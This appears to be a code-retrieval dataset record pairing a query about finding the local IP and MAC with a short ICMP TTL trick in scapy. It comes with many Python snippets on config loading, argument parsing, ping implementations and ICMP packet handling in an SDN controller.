os.environ['OCT_FIRE_SETTINGS'] if 'OCT_FIRE_SETTINGS' in os.environ else None\n if not settingsPath:\n settingsPath = findSettingsFile()\n logging.warning('Using settings from %s', settingsPath)\n settingsStr = goog_helper.readFile(settingsPath)\n settingsDict = json.loads(settingsStr)\n # logging.warning('settings %s', settingsDict)\n return settingsDict", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parseOptions(self):\n\n\t\tparser = OptionParser()\n parser.add_option(\n \"-u\",\n \"--user\",\n dest=\"user\",\n help=\"enter a user or 'all'\"\n )\n\n parser.add_option(\n \"-p\",\n \"--projects\",\n dest=\"projects\",\n help=\"enter a project or 'all'\"\n )\n (self.options, self.args) = parser.parse_args()", "def readSettings(self):\n settings = QtCore.QSettings()\n # defaults to the current directory path\n current_dir_abspath = os.path.abspath('')\n defaultValue = QtCore.QString(current_dir_abspath)\n # Warning:\n # QSettings.value can return different types (QVariant types) depending on the platform it's running on,\n # so the safest way to use it is always casting the result to the desired type, e.g.: int(settings.value(\"myKey\")).\n output_directory = settings.value(\"output_directory\", defaultValue=defaultValue).toString()\n self.ui.outputDirLineEdit.setText(output_directory)", "def load_settings(self):\n\n self.std = settings.settings", "def _load_config(self, args: argparse.Namespace):\n #\n # Load a config, filename may or may-not be provided...\n #\n try:\n self._config = TortugaScriptConfig.load(args.config)\n\n except ConfigException as ex:\n print(str(ex))\n sys.exit(0)\n\n #\n # Override the config with any provided argument values\n #\n if args.url:\n self._config.url = args.url\n if args.username:\n self._config.username = args.username\n if args.password:\n self._config.password = args.password\n if args.token:\n self._config.token = args.token\n self._config.verify = args.verify", "def parse_user_arguments():\n\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-m\", \"--method\",\n help=\"Enter the type of baseline run, \"\n \"bm_25, tf_idf or jm_qlm\", required=True)\n\n ap.add_argument(\"-j\", \"--json_fname\", help=\"Enter the path to the json \"\n \"filename containing\"\n \"all the paths to the \"\n \"test_collection\",\n required=True)\n\n return vars(ap.parse_args())", "def read_args():\r\n global args\r\n parser = argparse.ArgumentParser(\r\n description='Executes create, list-nodes, list-all, execute, backup, list-backups and rollback tasks on AWS '\r\n 'system')\r\n\r\n # What the code will do? The actions...\r\n parser.add_argument('action', help='Type of work', choices=[\"create\", \"list-nodes\", \"list-all\", \"execute\", \"backup\",\r\n \"list-backups\", \"roll-back\", \"terminate-all\"])\r\n parser.add_argument('--customer-id', help='Shows customer ID', required=False)\r\n parser.add_argument('--node-type', help='Shows node type, values can be \"Manager\" or \"Peer\"',\r\n choices=[\"Manager\", \"Peer\"], required=False)\r\n parser.add_argument('--script', help='Shows the script that will be executed on Aws instance', required=False)\r\n parser.add_argument('--node-id', help='Shows node (Instance) ID on AWS', required=False)\r\n parser.add_argument('--backup-id', help='Shows snapshot ID on AWS', required=False)\r\n\r\n args = parser.parse_args()", "def get_config(args):\n load_args={}\n with open(args.config, 'r') as f:\n for line in f:\n key, value = line.strip().split('=')\n try:\n value = int(value)\n except ValueError:\n try:\n value = float(value)\n except ValueError:\n value = value\n load_args[key] = value\n args.__dict__.update(load_args)", "def setup_settings():\n settings = DEFAULT_SETTINGS\n if os.environ.get(\"MUTALYZER_SETTINGS\"):\n configuration_path = os.environ[\"MUTALYZER_SETTINGS\"]\n with open(configuration_path) as f:\n configuration_content = \"[config]\\n\" + f.read()\n loaded_settings = configparser.ConfigParser()\n loaded_settings.optionxform = str\n loaded_settings.read_string(configuration_content)\n loaded_settings = {\n sect: dict(loaded_settings.items(sect))\n for sect in loaded_settings.sections()\n }[\"config\"]\n for k in loaded_settings:\n if loaded_settings[k] in {\"yes\", \"true\", \"1\"}:\n loaded_settings[k] = True\n elif loaded_settings[k] in {\"no\", \"false\", \"0\"}:\n loaded_settings[k] = False\n elif loaded_settings[k].isnumeric():\n loaded_settings[k] = int(loaded_settings[k])\n settings.update(loaded_settings)\n\n return settings", "def _set_default_args(self):\n self._parser.add_argument(\"username\")\n self._parser.add_argument(\"password\")\n self._parser.add_argument(\n \"--start\",\n help=\"Start date for the scraper in iso format, eg: 2017-11-19\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--end\",\n help=\"End date for the scraper in iso format\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--skip-delete\",\n help=\"Delete the scraper folder in /tmp after run\",\n action=\"store_true\",\n )", "def read_userconfig(self, userconfig):\n if hasattr(self, \"userconfig\"):\n raise ConfigError('User configuration already loaded from \"%s\"' %\n self.userconfig)\n #\n try:\n config = open(userconfig).read().split(\"\\n\")\n except IOError:\n raise ConfigError('Cannot read config from \"%s\"' % userconfig)\n #\n self.read_config(config)\n self.userconfig = os.path.abspath(userconfig)\n logger.info(\"Loaded user config: {0}\".format(self.userconfig))", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Convert environment variables in to a configuration file')\n parser.add_argument('-p',\n '--prefix',\n help='Prefix of env vars to parse',\n required=True)\n parser.add_argument('-f',\n '--format',\n help='Output file format',\n default='ini',\n choices=['ini', 'json'])\n parser.add_argument('-o',\n '--output-file',\n help='Outfile file path',\n default='/dev/stdout')\n parser.add_argument(\n '-r',\n '--reference-file',\n type=argparse.FileType('r'),\n help='Load this reference file for existing/hard coded values')\n\n return parser.parse_args()", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def test_settings(self):\n\n wf._items = []\n\n sys.argv = ['drive.py', '>']\n main(None)\n self.assertEqual(len(wf._items), 4)\n self.assertEqual(wf._items[0].title, SETTINGS['LOGIN']['title'])\n self.assertEqual(wf._items[1].title, SETTINGS['LOGOUT']['title'])\n self.assertEqual(wf._items[2].title, SETTINGS['CLEAR_CACHE']['title'])\n self.assertEqual(wf._items[3].title, SETTINGS['SET_CACHE']['title'] % '[seconds]')\n wf._items = []", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). '\n 'Process aborted')\n\n self.save_config()", "def read_settings():\n \n settings = OrdDic()\n settings.update(json.load(open(\"resources/files/settings.txt\", \"r\")))\n\n ## OLD WAY BELOW\n\n #r = open(\"resources/files/settings.txt\", \"r\", newline=\"\\n\")\n # for option in r.read().split('\\n'):\n # try:\n # #option = option.split('\\\\')\n # #settings.update({option[0]: option[1]})\n # # settings.update(json.loads(option))\n # except IndexError:\n # pass\n return settings", "def parseCommandLine_(self):\n\n self.ensureNotCreated()\n\n import sys\n\n parseCommandLine = False\n for argv in sys.argv:\n if 'globalTag' in argv or 'era' in argv or 'process' in argv:\n parseCommandLine = True\n break\n\n if parseCommandLine:\n from FWCore.ParameterSet.VarParsing import VarParsing\n options = VarParsing()\n options.register('globalTag',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'The globaltag to use')\n\n options.register('era',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Era of the dataset')\n\n options.register('process',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Process name of the MiniAOD production.')\n\n options.parseArguments()\n\n if options.globalTag:\n self.globalTag = options.globalTag\n\n if options.era:\n assert options.era == '25ns' or options.era == '50ns'\n if options.era == '25ns':\n self.era = eras.Run2_25ns\n else:\n self.era = eras.Run2_50ns\n\n if options.process:\n self.processName = options.process", "def read_settings():\n settings_path = join(dirname(dirname(__file__)), '.settings')\n filename = settings_path\n settings = configparser.ConfigParser()\n settings.read(filename)\n return settings", "def main():\n args = parse_args()\n process_args(args)", "def get_configuration(args):\n\n #------------------------------------------------------------------------\n # If configfile is not specified, dump a configfile on screen\n default_config, required_config = get_default_configuration()\n if args.configfile is None:\n write_configuration(parser.prog, version, default_config, required_config)\n raise SystemExit\n\n #------------------------------------------------------------------------\n # If you are here, then a configfile was given. Try to parse it\n userconf = ConfigParser.SafeConfigParser()\n userconf.read(args.configfile)\n runconf = {}\n\n if userconf.has_option('Config', 'verbose'): \n runconf['verbose'] = userconf.getboolean('Config', 'verbose')\n else:\n runconf['verbose'] = default_config['verbose']\n\n if runconf['verbose']: print \"Configuration for this run: \"\n for key in required_config.keys():\n try:\n runconf[key] = userconf.getfloat('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n except ConfigParser.NoOptionError:\n if runconf['verbose']: print \"\\nError: Required parameter {key} missing from config file!!\".format(key=key)\n if runconf['verbose']: print \"Update the file {configfile} and try again\\n\".format(configfile=args.configfile)\n raise SystemExit\n except ValueError:\n runconf[key] = userconf.get('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n\n for key in default_config.keys():\n if key == 'verbose': continue\n try:\n runconf[key] = userconf.getfloat('Config', key)\n except ConfigParser.NoOptionError:\n runconf[key] = default_config[key]\n if runconf['verbose']: print \"Using default value for {key}\".format(key=key)\n except ValueError:\n runconf[key] = userconf.get('Config', key)\n if runconf['verbose']: print \" > {key} = {val}\".format(key=key, val=runconf[key])\n\n # Now convert the bool values: verbose is already processed\n boolkeys = ['auto', 'do_fit']\n for b_key in boolkeys:\n #print b_key, runconf[b_key]\n test_string = \"{b_key}\".format(b_key = runconf[b_key])\n #print test_string\n if (test_string[0].upper() == 'T') or (test_string[0] == '1'):\n runconf[b_key] = True\n else:\n runconf[b_key] = False\n #print b_key, runconf[b_key]\n\n # Configuaration finally parsed!\n # At some future time, I should validate it...\n return runconf", "def __init__(self):\n try:\n with open(os.path.expanduser(\"~/.dkeyrc\"), 'r') as f:\n self.__cfgdata = json.load(f)\n except Exception as e:\n print(\"Error: Unable to load config JSON at ~/.dkeyrc -- %s\" % (e))\n sys.exit(1)", "def read_config(self):\n cfg = read_conf(self.CONF_FILE)\n self.channel = cfg['channel']\n self.seuil_min = cfg['seuil_min']\n self.last_level = cfg['last_level']\n self.last_level_date = cfg['last_level_date']", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def main():\n \n try:\n opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw='])\n except getopt.error, msg:\n print 'python syncContacts.py --user [username] --pw [password]'\n sys.exit(2)\n\n user = ''\n pw = ''\n # Process options\n for option, arg in opts:\n if option == '--user':\n user = arg\n elif option == '--pw':\n pw = arg\n\n run(user,pw)", "def process_commandline():\n parser = OptionParser(__doc__.strip())\n support_path = '/Library/' if os.getuid() == 0 else os.path.expanduser('~/Library/')\n preference_file = os.path.join(support_path, 'Preferences', 'com.googlecode.pymacadmin.crankd.plist')\n module_path = os.path.join(support_path, 'Application Support/crankd')\n\n if os.path.exists(module_path):\n sys.path.append(module_path)\n else:\n print >> sys.stderr, \"Module directory %s does not exist: Python handlers will need to use absolute pathnames\" % module_path\n\n parser.add_option(\"-f\", \"--config\", dest=\"config_file\", help='Use an alternate config file instead of %default', default=preference_file)\n parser.add_option(\"-l\", \"--list-events\", action=\"callback\", callback=list_events, help=\"List the events which can be monitored\")\n parser.add_option(\"-d\", \"--debug\", action=\"count\", default=False, help=\"Log detailed progress information\")\n (options, args) = parser.parse_args()\n\n if len(args):\n parser.error(\"Unknown command-line arguments: %s\" % args)\n\n options.support_path = support_path\n options.config_file = os.path.realpath(options.config_file)\n\n # This is somewhat messy but we want to alter the command-line to use full\n # file paths in case someone's code changes the current directory or the\n sys.argv = [ os.path.realpath(sys.argv[0]), ]\n\n if options.debug:\n logging.getLogger().setLevel(logging.DEBUG)\n sys.argv.append(\"--debug\")\n\n if options.config_file:\n sys.argv.append(\"--config\")\n sys.argv.append(options.config_file)\n\n return options", "def parse_command_line():\n\n desc = \"Perform fluid dynamics simulations.\"\n parser = argparse.ArgumentParser(description=desc)\n\n # Parameter file\n help_txt = \"name of the configuration file (default is 'config.ini.')\"\n parser.add_argument(\"-f\", \"--file\", metavar=\"FILE\", default=\"config.ini\",\n required=False, dest=\"config_file\", help=help_txt)\n\n return parser.parse_args()", "def user_config():\n user_config = copy.deepcopy(config)\n user_config.pop(\"metadata\")\n user_config.pop(\"version\")\n user_config.pop(\"refers\")\n user_config.pop(\"pool_size\")\n return user_config", "def __init__(self):\n\n self.config = load_config()\n self.set_env_var()" ]
[ "0.7167355", "0.68207556", "0.64562625", "0.6258873", "0.6210641", "0.611424", "0.6007026", "0.59203523", "0.5906044", "0.5899174", "0.5890425", "0.5873461", "0.586222", "0.58594745", "0.58452356", "0.58350545", "0.5832136", "0.58280176", "0.5820044", "0.58118266", "0.57982767", "0.578663", "0.578479", "0.57750136", "0.5734979", "0.5726565", "0.5723044", "0.57195425", "0.57112813", "0.57050145", "0.56740767", "0.56306046", "0.5618366", "0.56147", "0.55839205", "0.5560629", "0.55526453", "0.55419", "0.5522561", "0.55204207", "0.5496396", "0.5490235", "0.54831296", "0.54788417", "0.54685503", "0.5452977", "0.54481554", "0.5441359", "0.5433679", "0.5431753", "0.5423277", "0.54130244", "0.54118377", "0.5400214", "0.5393679", "0.5388049", "0.5380073", "0.53769815", "0.53699094", "0.5369281", "0.5357346", "0.53547853", "0.5354158", "0.53527683", "0.53415406", "0.5341248", "0.53404725", "0.5337396", "0.53269374", "0.53225845", "0.53207415", "0.5315764", "0.5310434", "0.5305158", "0.52955234", "0.5294928", "0.5284141", "0.52807426", "0.52797616", "0.5276462", "0.5274188", "0.52663356", "0.52652806", "0.52607816", "0.52569485", "0.52554345", "0.52552813", "0.5247078", "0.5244006", "0.52414656", "0.5240181", "0.5239197", "0.5229953", "0.5229196", "0.52273524", "0.52251697", "0.52225757", "0.52220404", "0.52218586", "0.5218774", "0.5216414" ]
0.0
-1
I send echo pck when the ttl is 0 so when it arrive to the GW he send me back a TTL ERROR (ICMP MESSEGE) , the dst is our ip.
def find_my_IP_and_MAC(): mac = ':'.join(re.findall('..', '%012x' % getnode())) # I write IP and not domain cause i want to save time. p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0,timeout=5) #verbose = withuot output return mac,p.dst
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pinger(dst):\n icmpId = 0x4711\n for i in range(MAX_NUM_PROBES):\n # Erzeuge das ICMP Echo Anfrage-Paket (type=8).\n # Der Parameter seq ist ein Zaehler fuer die Anfrage-Pakete.\n icmpPkt = ICMP() # Hier muss ergaenzt werden!\n \"\"\"\n scapy liefert die Klasse ICMP mit der ein ICMP-Paket erzeugt werden kann.\n Es hat die folgenden Felder:\n >>> i = ICMP()\n >>> i.default_fields\n {'addr_mask': '0.0.0.0',\n 'chksum': None,\n 'code': 0,\t\t\t# \n 'gw': '0.0.0.0',\n 'id': 0,\n 'length': 0,\n 'nexthopmtu': 0,\n 'ptr': 0,\n 'reserved': 0,\n 'seq': 0,\n 'ts_ori': 70195301,\n 'ts_rx': 70195301,\n 'ts_tx': 70195301,\n 'type': 8, # echo request\n 'unused': 0}\n\n Ueberlegen Sie, welche Felder Sie beim Erzeugen der ICMP-Instanz mit welchen\n Werten versehen muessen. Die Parameteruebergabe funktioniert mit\n Parametername=Parameterwert, also z.B.:\n ICMP(type=5, code=3, ...)\n \"\"\"\n\n # Nun wird das Anfragepaket erzeugt. Die unterste Schicht, die wir hier angeben muessen \n # ist IP (die Vermittlungsschicht). Um alle Schichten darunter kuemmert sich scapy bzw.\n # das Betriebssystem. \n # Dem IP-Paket geben wir als Ziel-IP-Adresse den Wert der Variable dst an. Scapy kuemmert\n # sich automatisch darum, eine passende Quell-IP-Adresse zu verwenden.\n # Die Schichtung von Paketen erfolgt mit Hilfe des Schraegstrich-Operators '/'.\n ipPkt = IP(dst=dst)\n req = ipPkt/icmpPkt\n\n # Gib eine Zusammenfassung des fertigen Pakets aus\n req.show2()\n\n # Die einfachste Art der Implementierung nutzt die Funktion sr() von scapy.\n # Der Name sr() steht dabei fuer `send` und `receive`, also `sende` und `empfange`.\n # Informationen zu sr() finden Sie hier: \n # https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr\n # Warte maximal 5 Sekunden auf eine Antwort (timeout=5).\n ans, unans = sr(req, timeout=5, verbose=0)\n # Gib eine einzeilige Zusammenfassung von Anfrage und Antwort aus\n ans.summary()\n # Warte 0.9 Sekunden bis zur naechsten Iteration\n time.sleep(0.9)", "def atraso(myStats, destIP, hostname, timeout, mySeqNumber, packet_size, quiet=False):\n delay = None\n \n \"\"\"\n socket.AF_INET, é uma string que representa um nome de host na notação de domínio da Internet \n como 'daring.cwi.nl' ou um endereço IPv4 como '100.50.200.5' e porta é um inteiro.\"\"\"\n \"\"\"\n socket.getprotobyname(protocolname), Traduz um nome de protocolo da Internet (por exemplo, 'icmp') \n para uma constante adequada para passar como o terceiro argumento (opcional) \n para a função socket (). Isso geralmente é necessário apenas para soquetes abertos \n no modo \"bruto\" (SOCK_RAW); para os modos normais de soquete, o protocolo correto é \n escolhido automaticamente se o protocolo for omitido ou zero.\n \"\"\"\n\n try: \n mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error as e:\n print(\"Falhou!!!. (Erro de socket: '%s')\" % e.args[1])\n\n my_ID = os.getpid() & 0xFFFF # retorna a identificação do processo atual.\n\n sentTime = send_one_ping(mySocket, destIP, my_ID, mySeqNumber, packet_size) # retorna o tempo enviado\n if sentTime == None:\n mySocket.close()\n return delay\n\n myStats.pktsSent += 1 # contador de pacotes enviados\n\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL = receive_one_ping(\n mySocket, my_ID, timeout) \n mySocket.close()\n\n if recvTime: # tempo de resposta for verdadeiro\n delay = (recvTime-sentTime)*1000 # tempo de resposta - tempo de envio = delay(ms)\n if not quiet:\n # exibição das respostas do ping\n responseServer = {'bytes': dataSize, 'ip': socket.inet_ntoa(struct.pack(\"!I\", iphSrcIP)), 'sequencia': icmpSeqNumber, 'ttl': iphTTL, 'tempo': round(delay,2)}\n listResponse.append(responseServer)\n\n\n myStats.pktsRcvd += 1 # contador de pacotes recebidos\n myStats.totTime += delay # contador do tempo total (todos os times desse host) \n if myStats.minTime > delay:\n myStats.minTime = delay # contador tempo mínimo\n if myStats.maxTime < delay: \n myStats.maxTime = delay # contador tempo máximo\n else:\n delay = None\n print(\"Requesição excedeu o tempo limite.\")\n\n return delay", "def send_one_ping(mySocket, destIP, myID, mySeqNumber, packet_size):\n \n myChecksum = 0 # contador da soma de verificação\n\n # Faça um cabeçalho fictício com uma soma de verificação 0\n # Retorne uma string contendo os valores compactados de acordo com o formato especificado. \n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n padBytes = []\n startVal = 0x42\n \n for i in range(startVal, startVal + (packet_size-8)):\n padBytes += [(i & 0xff)] # Mantenha os caracteres no intervalo de 0 a 255\n data = bytearray(padBytes)\n\n # Calculo a soma de verificação nos dados e no cabeçalho fictício.\n myChecksum = checksum(header + data) # A soma de verificação está em ordem de rede\n\n # Agora que temos a soma de verificação correta, colocamos isso. \n # É apenas mais fácil, para criar um novo cabeçalho do que colocá-lo no modelo.\n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n # pacotes com a integridade dos dados verificada e com cabeçalho checksum adicionado.\n packet = header + data\n\n sendTime = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n try:\n \"\"\" \n socket.sendto(bytes, address)\n Retornar o número de bytes enviados.\n \"\"\"\n mySocket.sendto(packet, (destIP, 1))\n except socket.error as e:\n print(\"Falha Geral (%s)\" % (e.args[1]))\n return\n\n return sendTime", "def scapy_create_send_ICMP(self, ipdst):\n ip_header = self.define_ip_header(dst=ipdst)\n icmp_header = self.define_icmp_header()\n send(ip_header/icmp_header, count = DEFAULT_PACKET_DURATION)", "def reply_icmp(self, datapath, srcMac, dstMac, srcIp, dstIp, ttl, type, id,\n seq, data, inPort):\n\n router_port = self.get_router_port_by_gateway_ip(datapath.id, dstIp)\n if router_port:\n # dstIp is the IP of one of the router ports\n # -> replay\n # data already available\n send_src_mac = dstMac\n send_dst_mac = srcMac\n send_src_ip = dstIp\n send_dst_ip = srcIp\n send_port = inPort\n self.send_icmp(datapath, send_src_mac, send_src_ip, send_dst_mac,\n send_dst_ip, send_port, seq, data, id, 0, ttl)\n LOG.debug(\"send icmp echo reply %s => %s (port%d)\"\n % (send_src_mac, send_dst_mac, send_port))\n\n else:\n # if in own net.\n matching_port = self.get_port_by_ip(datapath, dstIp)\n if matching_port:\n # send ARP request opcode =1\n # A flow rule is created when receiving the arp reply from client\n # self.send_arp(datapath, 1, matching_port.mac, str(matching_port.gateway_ip), \"00:00:00:00:00:00\", dstIp,\n # int(matching_port.port_no))\n pass\n else:\n print (\"Forward ICMP to matching network\")\n out_port, new_src_mac, new_dst_mac = self.get_next_hop(dpid=datapath.id, dstIP=dstIp)\n if out_port and new_dst_mac and new_dst_mac:\n self.add_flow_gateway_for_ip(datapath, int(out_port), dstIp, new_src_mac, new_dst_mac)\n # self.add_flow_gateway(datapath,ether.ETH_TYPE_IP, new_src_mac,new_dst_mac,int(out_port),dstIp)\n\n return 0", "def do_one(dest_addr, timeout):\n icmp = socket.getprotobyname(\"icmp\")\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted\n msg = msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(msg)\n raise # raise the original error\n \n my_ID = os.getpid() & 0xFFFF\n \n send_one_ping(my_socket, dest_addr, my_ID)\n delay = receive_one_ping(my_socket, my_ID, timeout)\n \n my_socket.close()\n return delay", "def do_one(dest_addr, timeout, icmp = 1):\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error as e:\n if e.errno == 1:\n # Operation not permitted\n e.msg = e.msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(e.msg)\n raise # raise the original error\n\n my_id = os.getpid() & 0xFFFF\n\n send_one_ping(my_socket, dest_addr, my_id)\n delay = receive_one_ping(my_socket, my_id, timeout)\n\n my_socket.close()\n return delay", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def send_ttl_expire(s, in_eth, in_ip, payload):\n saddr = ttl2ip(in_ip.ttl, in_ip.daddr)\n\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=5,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=saddr,\n daddr=in_ip.saddr,\n )\n icmp = icmphdr(11, 0, 0, 0, 0)\n\n ip.tot_len = len(ip) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(len(eth) + len(ip) + len(icmp) + len(payload))\n msg = bytearray(eth) + bytearray(ip) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt = pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def receive_one_ping(self, current_socket):\n import select\n from struct import pack, unpack\n\n class 